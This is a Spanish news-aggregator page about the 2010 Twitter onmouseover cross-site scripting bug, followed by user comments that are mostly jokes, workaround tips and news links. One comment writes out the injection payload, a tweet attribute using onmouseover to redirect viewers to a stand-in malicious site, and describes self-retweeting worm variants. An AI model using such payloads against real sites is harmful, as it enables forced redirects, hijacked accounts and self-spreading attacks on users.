Portada
Hace 13 años | Por Dan a sophos.com
Publicado hace 13 años por Dan a sophos.com
Un bug causa el caos en Twitter [ENG]

Un bug causa el caos en Twitter [ENG]

 sophos.com

El sitio web de Twitter está siendo victima de un ataque causado por usuarios que han encontrado con un fallo de seguridad que permite abrir mensajes pop-up y sitios web de terceros en el navegador con solo mover el ratón sobre un tweet.

Etiquetas

DE3C548D-E347-406A-A60F-E6BBD322CAB7 4.5k 64

Comentarios

Milhaud

Sinceramente, si cuando implementaron el 'onmouseover' para visualizar los perfiles, no taparon todos los potenciales problemas de seguridad... se lo merecen.

Van a rodar cabezas.

V 29
K 274
D
editado

Están trabajando en ello, aquí se puede ver http://bit.ly/a4FaYR

V 25
K 229
angelitoMagno
editado

Lo mejor es que si entras en

arriba del todo pone:
¡Una nueva experiencia de Twitter está a punto de llegar!

lol lol lol lol

V 21
K 203
D
editado

████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████

V 20
K 183
vivazidane

Una solución momentánea si no queréis utilizar clientes de escritorio: http://bit.ly/19phLt

V 6
K 67
t

es tan sencillo como pegar un twitt como este:

"onmouseover="javascript:window.location = ‘http://www.miwebmaliciosaconexploit.com/’;"/

es decir
#@"onmouseover=javascript:;"/

ya si quieres la añades un hashtag para mas difusion...

hay peña que se ha currado que te rellene tu formulario y retwittee el javascript y asi autorreplicandose..

V 6
K 66
b

El peor de todas las versiones de ese exploit, es el que te ocupa toda la pantalla y no te deja hacer nada, y se retwittea a@Matsta..por curiosidad he entrado en su perfil de twiter, y adivinad que se encuentra en www.matsta.org .......
FAIL

V 5
K 59
txentxubros

¡Se acerca la destrucción del mundo tal y como lo conocemos! lol

V 5
K 55
t

#18 Póngamosle música

V 0
K 9
D

viva la web 2.0 bien diseñada

V 3
K 37
D

El bug por ahora solo funciona en Twitter web. Quien usa aplicaciones de escritorio como twertdeck, se supone que está seguro.

Me veo que muchos van a liarla parda con esto. Ya sabemos como es el ser humano con estas cosas y lo que puede llegar a hacer.

V 2
K 37
VITIMan

Como dice #2 el problema es desde la página principal. Desde aplicaciones como echofon, tweetdeck o similares se está "a salvo".

Bonito problemón le ha surgido a twitter.

V 1
K 14
D

Lleva un rato arreglado (

). Borrar temporales, cookies, etc; cerrar y volver a abrir

V 2
K 29
montag

enjuto se acaba de suicidar....

V 2
K 29
D

La noticia en castellano http://eskup.elpais.com/1285071483-b551283cd5bcf2b2fe1c3ee5bae9e1fb

V 1
K 27
Dan
autor

Más info en http://mashable.com/2010/09/21/twitter-mouseover-bug/

V 1
K 23
natrix

¿Alguien sabe cómo identificarlos?

V 1
K 23
cron

#6 si te viene un enlace raro no te pongas encima...

V 0
K 13
J

Desde

no pasa nada.

V 2
K 21
Dan
autor

Un ejemplo del exploit:

V 1
K 20
D

#9 Yo pongo el ratón sobre eso y no me pasa nada

V 0
K 14
Dan
autor

#10 tiene q aparecer en tu time line, osea, tienes q followear al usuario.

V 0
K 11
D

#11 ok

V 0
K 14
D

La cosa va a peor

V 0
K 17
caguenross

¡Vamos a morir todos!

V 1
K 16
a

Best solution for all web twitter users (until they fix the XSS): use mobile.twitter.com

V 1
K 15
MMunera

Pues oye, que les den a los programadores. No vigilar el injection es un error de campeonato. Vaya Fail más heavy.

V 1
K 15
D

#20 FAIL! es un XSS (cross site scripting)

V 0
K 6
zordon

¡¡¡Dios mio!!! ¡Que tragedia! Se acerca la profecia maya.. roll

V 2
K 11
damian

Se están montando parda en el Twitter...de todas formas es una cagada de primaria....

V 0
K 10
oneras

Joe, vaya susto. Yo pensaba que había fastidiado la configuración porque justo acaba de abrir una cuenta para un nuevo proyecto y me había petado en algún momento. Luego he ido a mirar el twitter de la empresa y lo mismo. Susto. Al final que me he quedado sin comer a la hora. Algo comeré ahora y como consuelo ante esta curiosa situación... viendo esto:

V 0
K 10
Ferran

A mi en Chrome en Mac no me sale nada

V 0
K 10
a

twitFAIL

V 0
K 9
D

A mi me lo han pasado... he podido entrar en mi perfil y hacer un undo del RT. Me esperaré a poder entrar.

V 0
K 9
Candidatas
44
meneos
actualidad Grave tiroteo entre soldados de Egipto e Israel en la frontera de Rafah
43
meneos
actualidad La instrucción del juez que investiga a Begoña Gómez: de los ‘lloros’ contra el fiscal a las meteduras de pata
31
meneos
actualidad El Ayuntamiento de Madrid da dos meses a la pareja de Ayuso para que legalice las obras que hizo sin permiso
35
meneos
tecnología La batalla por la batería del futuro en la que China se juega su hegemonía en el coche eléctrico
44
meneos
politica El genocidio desde el espacio: Gaza de noche 2023 vs 2024
34
meneos
actualidad El ex concejal de Ponferrada condenado por intentar matar a su mujer vuelve al banquillo
39
meneos
actualidad El profesor expedientado de Calahorra es miembro del tribunal de las próximas oposiciones de La Rioja para docentes
57
meneos
actualidad Israelíes bailando y coreando lemas genocidas en un club [EN]
35
meneos
actualidad Muere asesinado el actor de 'Hospital General' Johnny Wactor a los 37 años cuando trataba de impedir un robo
44
meneos
actualidad Cadáveres en bolsas a la vista y ataúdes y coronas apiladas en el cementerio de Sevilla
21
meneos
actualidad El enemigo número uno de Milei. Santiago Cuneo
27
meneos
actualidad Los bancos europeos en Rusia se enfrentan a "muchísimos riesgos", dice Yellen (EN)
44
meneos
actualidad Trump abucheado al tratar de conquistar votos de libertarios: el republicano intentó obtener apoyos en las filas del Partido Libertario pero solo recibió rechiflas e insultos
m

Un ejemplo real (no hace falta tener cuenta de twitter): pasar el ratón por el twit que dice "No pases el ratón"

(aparece un popup que pone "Hola")

V 0
K 8
Maki_Hirasawa

Voy a twittear la noticia..

editado:
aagghh!! lol

V 0
K 7
s
editado

Whooops! Something went technically wrong!

V 0
K 7
t

Corrijo: parecia.. con el raton encima de la imagen del usuario sigue funcionando..

V 0
K 7
t

Parece que ya esta solucionado..

V 0
K 7
pusilanime_hedonista

yo lo que no entiendo es eso que dicen del twitter de Sarah Brown UK.
¿Como llegó ese tweet ahí? No me lo explico

V 0
K 7
p
editado

#30 porque algunos exploits se autocopiaban en el formulario y se enviaban solos

V 2
K 22
pusilanime_hedonista

#33 ahhhh

V 0
K 7
Smoje

Curiosidad o no, pero también actualizaron la aplicación para Android, no sé si también tenía algún problemilla...

V 0
K 6
D

karmawhores hasta para esto

he sido victima, lo reconozco, he estado con los huevillos de corbata

V 0
K 6
D

Si es que ya no estamos seguros ni en el tuiter. http://bit.ly/aUFSEg

V 0
K 6
D

No lo veo gracias a noscript, pero no es que me importe, tampoco uso twitter.

V 0
K 6
D
editado

Ésto no pasaría si ...

V 0
K 6
t

Joer, me he vuelto loco no sabía que pasaba... bueno, habrá que tirar de versión móvil, esperemos que se solucione pronto.

V 0
K 6
kherihon

SIN COMENTARIOS.... ya se ha dicho todo.

V 0
K 6
HazCerveza

A que hora fue eso, porque yo entre con firefox y no aparece nada!!

V 0
K 6
A

El mileniarismo ha llegadoooo

V 0
K 6
vivazidane

Desactivando Javascript debería servir si el problema es el evento 'OnMouseOver'... ¿o esto no era de Javascript?

V 0
K 6
makormix

Yo estaba flipando con lo que estaba leyendo en los timelines de la gente. Menos mal que uso un cliente y no lo he extendido más.
De todas formas, tampoco me he extrañado demasiado, porque con las cosas que leo ahí de vez en cuando...

V 0
K 6
D

A mí me ha salido el de Matsta ese y me lo ha pasado angel martin el de SLQH
Pa un dia que entro a twitter antes que a meneame...

V 0
K 6
D
editado

ya lo dijo Spock...

V 0
K 6
m

Supongo que será un caos de menos de 160 caracteres

Fdo: un no usuario de twitter

V 0
K 6
maybe-me

#31 Se nota, se nota. Son 140

V 2
K 24
sithwoody

En esto de las redes sociales nadie se escapa y comparado con los bugs de facebook, lo de Twitter sigue siendo aceptable

http://www.google.com/trends?q=bug+twitter%2C+bug+facebook&ctab=0&geo=all&date=all&sort=0

V 0
K 6
UlisesRey

#55 algo tendrá que ver tambien el número de usuarios no?

V 0
K 11
dxfilipo

Por suerte no tenemos ningún exploit de los navegadores más famosos en acción.
Si llegan a combinarlo con un buffer overflow de algún navegador sí que se podría haber liado parda.

V 0
K 5
delegar

Como todo en la web 2.0 el prueba y error sigue siendo la estrella, bien por los empleados de twitter que solucionaron el problema a la brevedad.
En mi caso uso TweetDeck asi que ni me entere

V 0
K 5
citricut

A llorar a Jerusalén!

V 1
K -1
damian

¡¡¡El bug del Tiwtter ha salido en SLQH!!!

V 4
K -25
dxfilipo

#49 Para que veas que los personajes del mundo de la televisión, entienden lo que quieren.
Berto Romero lee Menéame....pero no lo entiende...[Humor]

Hace 13 años | Por zalo a lasexta.com
Publicado hace 13 años por zalo a lasexta.com

Berto Romero lee Menéame....pero no lo entiende......

 lasexta.com

V 0
K 5